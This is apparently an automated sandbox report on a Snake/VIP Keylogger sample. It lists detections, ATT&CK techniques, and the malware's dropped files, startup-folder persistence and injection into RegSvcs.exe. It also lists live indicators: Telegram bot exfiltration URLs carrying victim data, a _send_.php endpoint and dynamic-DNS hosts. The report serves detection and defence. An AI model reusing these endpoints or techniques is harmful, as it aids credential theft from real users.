                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2136, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2136, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2136, type: MEMORYSTR
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B31204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00B31204
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B31806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B31806
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00961204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00961204
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00961806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00961806

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		2
                Valid Accounts                		1
                Native API                		111
                Scripting                		1
                Exploitation for Privilege Escalation                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts                		2
                Valid Accounts                		3
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder                		21
                Access Token Manipulation                		1
                DLL Side-Loading                		NTDS127
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection                		1
                Masquerading                		LSA Secrets321
                Security Software Discovery                		SSH3
                Clipboard Data                		3
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                Registry Run Keys / Startup Folder                		2
                Valid Accounts                		Cached Domain Credentials111
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture24
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                Virtualization/Sandbox Evasion                		DCSync2
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587901 Sample: RubzLi27lr.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 12 other signatures 2->52 8 RubzLi27lr.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\spadixes.exe, PE32 8->26 dropped 58 Binary is likely a compiled AutoIt script file 8->58 60 Found API chain indicative of sandbox detection 8->60 14 spadixes.exe 2 8->14         started        62 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->62 18 spadixes.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\spadixes.vbs, data 14->28 dropped 64 Antivirus detection for dropped file 14->64 66 Multi AV Scanner detection for dropped file 14->66 68 Binary is likely a compiled AutoIt script file 14->68 74 4 other signatures 14->74 20 RegSvcs.exe 15 2 14->20         started        70 Writes to foreign memory regions 18->70 72 Maps a DLL or memory area into another process 18->72 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 mail.acadental.com 3.130.71.34, 49871, 49947, 587 AMAZON-02US United States 20->36 38 api.telegram.org 149.154.167.220, 443, 49814, 49913 TELEGRAMRU United Kingdom 20->38 40 2 other IPs or domains 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RubzLi27lr.exe68%VirustotalBrowse
                RubzLi27lr.exe68%ReversingLabsWin32.Trojan.AutoitInject
                RubzLi27lr.exe100%AviraHEUR/AGEN.1319493
                RubzLi27lr.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Hegeleos\spadixes.exe100%AviraHEUR/AGEN.1319493
                C:\Users\user\AppData\Local\Hegeleos\spadixes.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Hegeleos\spadixes.exe68%ReversingLabsWin32.Trojan.AutoitInject

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://mail.acadental.com100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                mail.acadental.com
                		3.130.71.34
                		truetrue
                  		unknown
                  reallyfreegeoip.org
                  		104.21.16.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		193.122.6.168
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:56:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:21:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high
                                http://checkip.dyndns.org/false
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/RegSvcs.exe, 00000009.00000002.3370233231.0000000003179000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.orgRegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/botspadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://www.office.com/lBRegSvcs.exe, 00000003.00000002.3370428340.0000000002D02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20aRegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000009.00000002.3370233231.0000000003147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://varders.kozow.com:8081spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://mail.acadental.comRegSvcs.exe, 00000003.00000002.3370428340.0000000002D42000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.00000000031B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://aborters.duckdns.org:8081spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000003.00000002.3370428340.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.00000000031A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://anotherarmy.dns.army:8081spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3368516346.0000000000434000.00000040.80000000.00040000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://checkip.dyndns.org/qspadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000003.00000002.3370428340.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000003.00000002.3370428340.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003070000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.000000000302A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.3370428340.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003097000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003070000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003000000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.3373483097.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3373483097.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3372995128.00000000042C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedspadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://reallyfreegeoip.org/xml/spadixes.exe, 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3370428340.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, spadixes.exe, 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3370233231.0000000003000000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          149.154.167.220
                                                                                          		api.telegram.orgUnited Kingdom
                                                                                          		62041TELEGRAMRUfalse
                                                                                          104.21.16.1
                                                                                          		reallyfreegeoip.orgUnited States
                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                          3.130.71.34
                                                                                          		mail.acadental.comUnited States
                                                                                          		16509AMAZON-02UStrue
                                                                                          193.122.6.168
                                                                                          		checkip.dyndns.comUnited States
                                                                                          		31898ORACLE-BMC-31898USfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1587901
                                                                                          Start date and time:2025-01-10 19:09:47 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 58s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:11
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:RubzLi27lr.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:eadcb6ea284444fdf72e7fa141be4a0d9d61d5bdd95bdb353e12c507915de1f8.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 49
                                                                                          • Number of non-executed functions: 308
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          13:10:45API Interceptor2779551x Sleep call for process: RegSvcs.exe modified
                                                                                          19:10:46AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          149.154.167.2206mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                            YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              104.21.16.1JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                                                              3.130.71.34Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                193.122.6.168YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • checkip.dyndns.org/
